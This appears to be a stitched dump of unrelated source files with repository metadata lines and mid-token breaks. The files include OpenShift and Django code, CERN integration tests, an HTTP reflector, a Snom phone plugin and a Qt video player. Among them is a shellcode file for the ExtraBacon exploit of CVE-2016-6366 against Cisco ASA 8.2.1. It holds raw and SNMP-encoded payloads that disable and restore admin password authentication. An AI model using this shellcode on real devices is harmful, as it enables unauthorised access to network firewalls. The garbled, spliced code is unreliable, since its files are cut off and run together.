results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = '/tmp/%s' % template_name
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['-n', self.namespace, 'create', '-f', fname])
def _get(self, resource, rname=None, selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector:
cmd.append('--selector=%s' % selector)
if self.all_namespaces:
cmd.extend(['--all-namespaces'])
elif self.namespace:
cmd.extend(['-n', self.namespace])
cmd.extend(['-o', 'json'])
if rname:
cmd.append(rname)
rval = self.openshift_cmd(cmd, output=True)
# Ensure results are retuned in an array
if rval.has_key('items'):
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
''' perform oadm manage-node scheduable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
cmd.append('--schedulable=%s' % schedulable)
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
cmd.extend
|
(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, o
|
utput=True, output_type='raw')
#pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
if grace_period:
cmd.append('--grace-period=%s' % int(grace_period))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
#pylint: disable=too-many-arguments
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = []
if oadm:
cmds = ['/usr/bin/oc', 'adm']
else:
cmds = ['/usr/bin/oc']
cmds.extend(cmd)
rval = {}
results = ''
err = None
if self.verbose:
print ' '.join(cmds)
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={'KUBECONFIG': self.kubeconfig})
stdout, stderr = proc.communicate(input_data)
rval = {"returncode": proc.returncode,
"results": results,
"cmd": ' '.join(cmds),
}
if proc.returncode == 0:
if output:
if output_type == 'json':
try:
rval['results'] = json.loads(stdout)
except ValueError as err:
if "No JSON object could be decoded" in err.message:
err = err.message
elif output_type == 'raw':
|
tiborsimko/analysis-preservation.cern.ch
|
tests/integration/test_delete_deposit.py
|
Python
|
gpl-2.0
| 7,407
| 0.00243
|
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2017 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
# or submit itself to any jurisdiction.
"""Integration tests for deleting deposits."""
import json
# #######################################
# # api/deposits/{pid} [DELETE]
# #######################################
def test_delete_deposit_with_non_existing_pid_returns_404(app,
auth_headers_for_superuser):
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format('non-existing-pid'),
headers=auth_headers_for_superuser)
assert resp.status_code == 404
def test_delete_deposit_when_user_has_no_permission_returns_403(app,
users,
create_deposit,
auth_headers_for_user):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
other_user_headers = auth_headers_for_user(users['lhcb_user2'])
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=other_user_headers)
assert resp.status_code == 403
def test_delete_deposit_when_user_is_owner_can_delete_his_deposit(app,
users,
create_deposit,
json_headers,
auth_headers_for_user):
owner = users['lhcb_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
headers = auth_headers_for_user(owner) + json_headers
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=headers)
assert resp.status_code == 204
# deposit not existing anymore
resp = client.get('/deposits/{}'.format(deposit['_deposit']['id']),
headers=headers)
assert resp.status_code == 410
def test_delete_deposit_when_deposit_published_already_cant_be_deleted(app,
users,
create_deposit,
json_headers,
auth_headers_for_user):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
headers = auth_headers_for_user(users['lhcb_user']) + json_headers
pid = deposit['_deposit']['id']
with app.test_client() as client:
resp = client.post('/deposits/{}/actions/publish'.format(pid),
headers=headers)
resp = client.delete('/deposits/{}'.format(pid),
headers=headers)
assert resp.status_code == 403
# deposit not removed
resp = client.get('/deposits/{}'.format(pid),
headers=headers)
assert resp.status_code == 200
def test_delete_deposit_when_superuser_can_delete_others_deposit(app,
users,
create_deposit,
auth_headers_for_superuser):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_superuser)
assert resp.status_code == 204
def test_delete_deposit_when_user_with_admin_access_can_delete(app,
users,
create_deposit,
auth_headers_for_user,
json_headers):
owner, other_user = users['lhcb_user'], users['cms_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
permissions = [{
'email': other_user.email,
'type': 'user',
'op': 'add',
'action': 'deposit-admin'
}]
with app.test_client() as client:
# give other user read/write access
resp = client.post('/deposits/{}/actions/permissions'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(owner) + json_headers,
data=json.dumps(permissions))
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 204
def test_delete_deposit_when_user_only_with_read_write_access_returns_403(app,
users,
create_deposit,
auth_headers_for_user,
json_headers):
owner, other_user = users['lhcb_user'], users['cms_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
permissions = [{
'email': other_user.email,
'type': 'user',
'op': 'add',
'action': 'deposit-read'
|
},{
'email': other_user.email,
'type': 'user',
'op':
|
'add',
'action': 'deposit-update'
}]
with app.test_client() as client:
# give other user read/write access
resp = client.post('/deposits/{}/actions/permissions'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(owner) + json_headers,
data=json.dumps(permissions))
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 403
|
BrandonBaucher/website-optimization
|
dummy_backend.py
|
Python
|
mit
| 1,866
| 0.009646
|
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
success = 0
total =0
def do_GET(self):
request_path = self.path
print("\n----- Request Start ----->\n")
print(request_path)
print(self.headers)
print("<----- Request End -----\n")
self.send_response(200)
self.send_header("Set-Cookie", "foo=bar")
def do_POST(self):
request_path = self.path
print("\n----- Request Start ----->\n")
# print(request_path)
#
request_headers = self.headers
content_length = request_headers.getheaders
|
('content-length')
length = int(content_length[0]) if content_length else 0
# print(request_h#eaders)
print(self.rfile.read(length))
"""
r = self.rfile.read(length).split('=')[-1]
print r
if r == 'true':
success += 1
total +=1
else:
total +=1
print success
print total
|
print''
"""
print("<----- Request End -----\n")
self.send_response(200)
do_PUT = do_POST
do_DELETE = do_GET
def main():
port = 8080
print('Listening on localhost:%s' % port)
server = HTTPServer(('', port), RequestHandler)
server.serve_forever()
if __name__ == "__main__":
parser = OptionParser()
parser.usage = ("Creates an http-server that will echo out any GET or POST parameters\n"
"Run:\n\n"
" reflect")
(options, args) = parser.parse_args()
main()
|
rebost/django
|
django/contrib/gis/gdal/__init__.py
|
Python
|
bsd-3-clause
| 2,164
| 0.001386
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existant file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
# Attempting to impo
|
rt objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to Tr
|
ue if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.datasource import DataSource
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, gdal_release_date, GEOJSON, GDAL_VERSION
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform
from django.contrib.gis.gdal.geometries import OGRGeometry
HAS_GDAL = True
except:
HAS_GDAL, GEOJSON = False, False
try:
from django.contrib.gis.gdal.envelope import Envelope
except ImportError:
# No ctypes, but don't raise an exception.
pass
from django.contrib.gis.gdal.error import check_err, OGRException, OGRIndexError, SRSException
from django.contrib.gis.gdal.geomtype import OGRGeomType
|
SINGROUP/pycp2k
|
pycp2k/classes/_restart14.py
|
Python
|
lgpl-3.0
| 665
| 0.003008
|
from pycp2k.inputsection import InputSection
from ._each406 import _each406
class _restart14(InputSection):
def __init__(self):
InputSection.__init__(self)
|
self.Section_parameters = None
self.Add_last = None
self.Common_iteration_levels = None
self.Filename = None
self.Log_print_key = None
self.EACH = _each406()
self._name = "RESTART"
self._keywords = {'Log_print_key': 'LOG_PRINT_KEY', 'Filename': 'FILENAME', 'Add_last': 'ADD_LAST', 'Common_iteration_levels': 'COMMON_ITERATION_LEVELS'}
self._subsections = {'EACH': 'EACH'}
self._attributes = [
|
'Section_parameters']
|
bx5974/sikuli
|
sikuli-ide/sample-scripts/resize-app.sikuli/resize-app.py
|
Python
|
mit
| 380
| 0.018421
|
def resizeApp(app, dx, dy):
switchApp(app)
corner = find(Pattern("1273159241516.png").targetOffset(3,14))
dragDrop(corner, corner.getCenter().offset(dx, dy
|
))
resizeApp("Safari", 50,
|
50)
# exists("1273159241516.png")
# click(Pattern("1273159241516.png").targetOffset(3,14).similar(0.7).firstN(2))
# with Region(10,100,300,300):
# pass
# click("__SIKULI-CAPTURE-BUTTON__")
|
MuhammadSohaib/colorado-geology-geodjango
|
geology/geology/wsgi.py
|
Python
|
mit
| 1,562
| 0.00064
|
"""
WSGI config for geology project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "geology.settings.produ
|
ction")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
a
|
pplication = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
RiskSense-Ops/CVE-2016-6366
|
extrabacon-2.0/versions/shellcode_asa821.py
|
Python
|
mit
| 4,530
| 0.003311
|
#
# this file autogenerated, do not touch
#
vers = "asa821"
my_ret_addr_len = 4
my_ret_addr_byte = "\x93\xf2\x2b\x09"
my_ret_addr_snmp = "147.242.43.9"
finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"
preamble_len = 41
preamble_byte = "\xb8\xc9\x3f\x10\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60"
preamble_snmp = "184.201.63.16.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96"
postscript_len = 2
postscript_byte = "\x61\xc3"
postscript_snmp = "97.195"
successmsg_len = 19
successmsg_byte = "\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58"
successmsg_snmp = "184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88"
launcher_len = 11
launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0"
launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208"
payload_nop_len = 116
payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\x
|
a5\xa5\xff\xd0\x58\xc3"
payload_nop_snmp =
|
"144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88.195"
payload_PMCHECK_DISABLE_len = 66
payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_PMCHECK_ENABLE_len = 66
payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_PMCHECK_ENABLE_snmp = "235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
payload_AAAADMINAUTH_DISABLE_len = 66
payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_AAAADMINAUTH_ENABLE_len = 66
payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
|
docteurmicro50/xivo-provd-plugins
|
plugins/xivo-snom/common/common.py
|
Python
|
gpl-3.0
| 15,004
| 0.001333
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010-2015 Avencall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
import logging
import os.path
import re
from operator import itemgetter
from xml.sax.saxutils import escape
from provd import tzinform
from provd import synchronize
from provd.devices.config import RawConfigError
from provd.devices.pgasso import BasePgAssociator, IMPROBABLE_SUPPORT, \
PROBABLE_SUPPORT, FULL_SUPPORT, NO_SUPPORT, COMPLETE_SUPPORT
from provd.plugins import StandardPlugin, FetchfwPluginHelper, \
TemplatePluginHelper
from provd.servers.http import HTTPNoListingFileService
from provd.util import norm_mac, format_mac
from twisted.internet import defer, threads
logger = logging.getLogger('plugin.xivo-snom')
class BaseSnomHTTPDeviceInfoExtractor(object):
_UA_REGEX = re.compile(r'\bsnom(\w+)-SIP ([\d.]+)')
_PATH_REGEX = re.compile(r'\bsnom\w+-([\dA-F]{12})\.htm$')
def extract(self, request, request_type):
return defer.succeed(self._do_extract(request))
def _do_extract(self, request):
ua = request.getHeader('User-Agent')
if ua:
dev_info = self._extract_from_ua(ua)
if dev_info:
self._extract_from_path(request.path, dev_info)
return dev_info
return None
def _extract_from_ua(self, ua):
# HTTP User-Agent:
# "Mozilla/4.0 (compatible; snom lid 3605)" --> Snom 6.5.xx
# "Mozilla/4.0 (compatible; snom320-SIP 6.5.20; snom320 jffs2 v3.36; snom320 linux 3.38)"
# "Mozilla/4.0 (compatible; snom320-SIP 7.3.30 1.1.3-u)"
# "Mozilla/4.0 (compatible; snom320-SIP 8.4.18 1.1.3-s)"
# "Mozilla/4.0 (compatible; snom710-SIP 8.7.3.19 1.1.5-IFX-05.01.12)"
# "Mozilla/4.0 (compatible; snom760-SIP 8.7.3.19 2010.06)"
# "Mozilla/4.0 (compatible; snom820-SIP 8.4.35 1.1.4-IFX-26.11.09)"
# "Mozilla/4.0 (compatible; snom870-SIP 8.4.35 SPEAr300 SNOM 1.4)"
# "Mozilla/4.0 (compatible; snomPA1-SIP 8.4.35 1.1.3-s)"
m = self._UA_REGEX.search(ua)
if m:
raw_model, raw_version = m.groups()
return {u'vendor': u'Snom',
u'model': raw_model.decode('ascii'),
u'version': raw_version.decode('ascii')}
return None
def _extract_from_path(self, path, dev_info):
m = self._PATH_REGEX.search(path)
if m:
raw_mac = m.group(1)
dev_info[u'mac'] = n
|
orm_mac(raw_mac.decode('ascii'))
class BaseSnomPgAssociator(BasePgAssociator):
def __init__(self, models,
|
version):
self._models = models
self._version = version
def _do_associate(self, vendor, model, version):
if vendor == u'Snom':
if version is None:
# Could be an old version with no XML support
return PROBABLE_SUPPORT
assert version is not None
if self._is_incompatible_version(version):
return NO_SUPPORT
if model in self._models:
if version == self._version:
return FULL_SUPPORT
return COMPLETE_SUPPORT
return PROBABLE_SUPPORT
return IMPROBABLE_SUPPORT
def _is_incompatible_version(self, version):
try:
maj_version = int(version[0])
if maj_version < 7:
return True
except (IndexError, ValueError):
pass
return False
class BaseSnomPlugin(StandardPlugin):
_ENCODING = 'UTF-8'
_LOCALE = {
u'de_DE': (u'Deutsch', u'GER'),
u'en_US': (u'English', u'USA'),
u'es_ES': (u'Espanol', u'ESP'),
u'fr_FR': (u'Francais', u'FRA'),
u'fr_CA': (u'Francais', u'USA'),
u'it_IT': (u'Italiano', u'ITA'),
u'nl_NL': (u'Dutch', u'NLD'),
}
_SIP_DTMF_MODE = {
u'RTP-in-band': u'off',
u'RTP-out-of-band': u'off',
u'SIP-INFO': u'sip_info_only'
}
_XX_DICT_DEF = u'en'
_XX_DICT = {
u'en': {
u'remote_directory': u'Directory',
},
u'fr': {
u'remote_directory': u'Annuaire',
},
}
def __init__(self, app, plugin_dir, gen_cfg, spec_cfg):
StandardPlugin.__init__(self, app, plugin_dir, gen_cfg, spec_cfg)
self._tpl_helper = TemplatePluginHelper(plugin_dir)
downloaders = FetchfwPluginHelper.new_downloaders(gen_cfg.get('proxies'))
fetchfw_helper = FetchfwPluginHelper(plugin_dir, downloaders)
self.services = fetchfw_helper.services()
self.http_service = HTTPNoListingFileService(self._tftpboot_dir)
http_dev_info_extractor = BaseSnomHTTPDeviceInfoExtractor()
def _common_templates(self):
yield ('common/gui_lang.xml.tpl', 'gui_lang.xml')
yield ('common/web_lang.xml.tpl', 'web_lang.xml')
for tpl_format, file_format in [('common/snom%s.htm.tpl', 'snom%s.htm'),
('common/snom%s.xml.tpl', 'snom%s.xml'),
('common/snom%s-firmware.xml.tpl', 'snom%s-firmware.xml')]:
for model in self._MODELS:
yield tpl_format % model, file_format % model
def configure_common(self, raw_config):
for tpl_filename, filename in self._common_templates():
tpl = self._tpl_helper.get_template(tpl_filename)
dst = os.path.join(self._tftpboot_dir, filename)
self._tpl_helper.dump(tpl, raw_config, dst, self._ENCODING)
def _update_sip_lines(self, raw_config):
proxy_ip = raw_config.get(u'sip_proxy_ip')
backup_proxy_ip = raw_config.get(u'sip_backup_proxy_ip')
voicemail = raw_config.get(u'exten_voicemail')
for line in raw_config[u'sip_lines'].itervalues():
if proxy_ip:
line.setdefault(u'proxy_ip', proxy_ip)
if backup_proxy_ip:
line.setdefault(u'backup_proxy_ip', backup_proxy_ip)
if voicemail:
line.setdefault(u'voicemail', voicemail)
def _get_fkey_domain(self, raw_config):
# Return None if there's no usable domain
if u'sip_proxy_ip' in raw_config:
return raw_config[u'sip_proxy_ip']
else:
lines = raw_config[u'sip_lines']
if lines:
return lines[min(lines.iterkeys())][u'proxy_ip']
return None
def _add_fkeys(self, raw_config, model):
domain = self._get_fkey_domain(raw_config)
if domain is None:
if raw_config[u'funckeys']:
logger.warning('Could not set funckeys: no domain part')
else:
lines = []
for funckey_no, funckey_dict in sorted(raw_config[u'funckeys'].iteritems(),
key=itemgetter(0)):
funckey_type = funckey_dict[u'type']
if funckey_type == u'speeddial':
type_ = u'speed'
suffix = ''
elif funckey_type == u'park':
if model in ['710', '720', '715', '760']:
type_ = u'orbit'
suffix = ''
else:
type_ = u'speed'
suffix = ''
elif funckey_type == u'blf':
if u'exten_pickup_call' in raw_config:
type_ = u'blf'
suffix = '|%s' % raw_config[u'exten_pickup_call']
else:
|
immstudios/firefly
|
proxyplayer/videoplayer.py
|
Python
|
gpl-3.0
| 9,818
| 0.000204
|
#!/usr/bin/env python3
import functools
from nxtools import logging, log_traceback
from .utils import (
Qt,
QWidget,
QSlider,
QTimer,
QHBoxLayout,
QVBoxLayout,
QIcon,
RegionBar,
TimecodeWindow,
get_navbar,
)
try:
from .mpv import MPV
has_mpv = True
except OSError:
has_mpv = False
log_traceback()
logging.warning(
"Unable to load MPV libraries. Video preview will not be available."
)
class DummyPlayer:
def property_observer(self, *args):
return lambda x: x
def __setitem__(self, key, value):
return
def __getitem__(self, key):
return
def play(self, *args, **kwargs):
pass
def seek(self, *args, **kwargs):
pass
def frame_step(self, *args, **kwargs):
pass
def frame_back_step(self, *args, **kwargs):
pass
class VideoPlayer(QWidget):
def __init__(self, parent=None, pixlib=None):
super(VideoPlayer, self).__init__(parent)
self.pixlib = pixlib
self.markers = {}
self.video_window = QWidget(self)
self.video_window.setStyleSheet("background-color: #161616;")
if not has_mpv:
self.player = DummyPlayer()
else:
try:
self.player = MPV(
keep_open=True, wid=str(int(self.video_window.winId()))
)
except Exception:
log_trac
|
eback(handlers=False)
self.player = DummyPlayer()
self.position = 0
self.duration = 0
self.mark_in = 0
self.mark_out = 0
sel
|
f.fps = 25.0
self.loaded = False
self.duration_changed = False
self.prev_position = 0
self.prev_duration = 0
self.prev_mark_in = 0
self.prev_mark_out = 0
#
# Displays
#
self.mark_in_display = TimecodeWindow(self)
self.mark_in_display.setToolTip("Selection start")
self.mark_in_display.returnPressed.connect(
functools.partial(self.on_mark_in, self.mark_in_display)
)
self.mark_out_display = TimecodeWindow(self)
self.mark_out_display.setToolTip("Selection end")
self.mark_out_display.returnPressed.connect(
functools.partial(self.on_mark_out, self.mark_out_display)
)
self.io_display = TimecodeWindow(self)
self.io_display.setToolTip("Selection duration")
self.io_display.setReadOnly(True)
self.position_display = TimecodeWindow(self)
self.position_display.setToolTip("Clip position")
self.position_display.returnPressed.connect(
functools.partial(self.seek, self.position_display)
)
self.duration_display = TimecodeWindow(self)
self.duration_display.setToolTip("Clip duration")
self.duration_display.setReadOnly(True)
#
# Controls
#
self.timeline = QSlider(Qt.Horizontal)
self.timeline.setRange(0, 0)
self.timeline.sliderMoved.connect(self.on_timeline_seek)
self.region_bar = RegionBar(self)
self.navbar = get_navbar(self)
#
# Layout
#
bottom_bar = QHBoxLayout()
top_bar = QHBoxLayout()
top_bar.addWidget(self.mark_in_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.io_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.mark_out_display, 0)
bottom_bar.addWidget(self.position_display, 0)
bottom_bar.addWidget(self.navbar, 1)
bottom_bar.addWidget(self.duration_display, 0)
layout = QVBoxLayout()
layout.addLayout(top_bar)
layout.addWidget(self.video_window)
layout.addWidget(self.region_bar)
layout.addWidget(self.timeline)
layout.addLayout(bottom_bar)
self.setLayout(layout)
self.navbar.setFocus(True)
@self.player.property_observer("time-pos")
def time_observer(_name, value):
self.on_time_change(value)
@self.player.property_observer("duration")
def duration_observer(_name, value):
self.on_duration_change(value)
@self.player.property_observer("pause")
def pause_observer(_name, value):
self.on_pause_change(value)
# Displays updater
self.display_timer = QTimer()
self.display_timer.timeout.connect(self.on_display_timer)
self.display_timer.start(40)
@property
def frame_dur(self):
return 1 / self.fps
def load(self, path, mark_in=0, mark_out=0, markers={}):
self.loaded = False
self.markers = markers
self.player["pause"] = True
self.player.play(path)
self.prev_mark_in = -1
self.prev_mark_out = -1
self.mark_in = mark_in
self.mark_out = mark_out
self.mark_in_display.set_value(0)
self.mark_out_display.set_value(0)
self.duration_display.set_value(0)
self.position_display.set_value(0)
def on_time_change(self, value):
self.position = value
def on_duration_change(self, value):
if value:
self.duration = value
self.loaded = True
else:
self.duration = 0
